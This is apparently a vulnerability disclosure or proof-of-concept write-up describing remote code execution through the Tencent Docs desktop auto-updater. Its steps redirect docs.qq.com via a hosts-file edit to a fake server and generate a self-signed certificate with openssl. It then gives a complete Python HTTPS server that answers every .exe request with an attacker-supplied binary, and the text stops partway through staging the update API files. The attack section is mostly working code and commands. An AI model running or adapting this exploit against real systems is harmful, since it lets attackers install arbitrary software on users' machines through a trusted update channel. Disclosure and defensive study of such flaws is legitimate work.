Hazard Description:
If an attacker controls a router, or can achieve DNS hijacking in the LAN, or poison a malicious proxy, it can control all the user computers on the network/proxy that are ready to update Tencent documents, which is very harmful!
If the user defaults to or selects automatic updates, they can unknowingly RCE
Test steps:
A host or virtual machine is required (acting as a user + a host or virtual machine (acting as a fake server.)
To make it simpler, the user's hosts file is directly tampered with, and the relevant domain name is directly resolved to the IP address of the fake server
192.168.146.1 docs.qq.com
At the same time, the fake server also opens the corresponding service python temp.py
✅ Step 1: Prepare the certificate
You will need two documents:
cert.pem (Public Key Certificate)
key.pem (private key)
You can generate them in openssl (I used kali:
openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -nodes
✅ Step 2: Python code
import http.server
import ssl
import os
import mimetypes
from urllib.parse import unquote, urlparse
from http.server import HTTPServer, SimpleHTTPRequestHandler
class FileResponder(SimpleHTTPRequestHandler):
def do_POST(self):
self.respond_file()
def do_GET(self):
# 如果是 .exe 请求,则直接返回 fake 文件
if self.path.lower().endswith(".exe"):
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
file_path = "1.exe"
with open(file_path, "rb") as f:
self.wfile.write(f.read())
print(f"📤 返回 EXE 替代资源: {file_path}")
return
# 否则走普通文件响应逻辑
self.respond_file()
def respond_file(self):
# 去除 query string,只保留路径部分
parsed_path = urlparse(self.path).path
path = unquote(parsed_path).lstrip('/')
file_path = os.path.join(os.getcwd(), path)
if os.path.isfile(file_path):
self.send_response(200)
ctype = mimetypes.guess_type(file_path)[0] or "application/octet-stream"
self.send_header("Content-type", ctype)
self.send_header("Content-Length", str(os.path.getsize(file_path)))
self.end_headers()
with open(file_path, "rb") as f:
self.wfile.write(f.read())
print(f"📤 返回资源: {file_path}")
else:
self.send_error(404, f"File not found: {file_path}")
# 配置 HTTPS 服务器
server_address = ('0.0.0.0', 443)
httpd = HTTPServer(server_address, FileResponder)
# 配置 SSL 加密
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='cert.pem', keyfile='key.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
print("[+] HTTPS server started on port 443")
httpd.serve_forever()
✅ Step 3: a host or virtual machine (acting as a fake server.)
Store the api\packageupgrade\update_manual in the current directory
Store the api\package\desktop_auto_update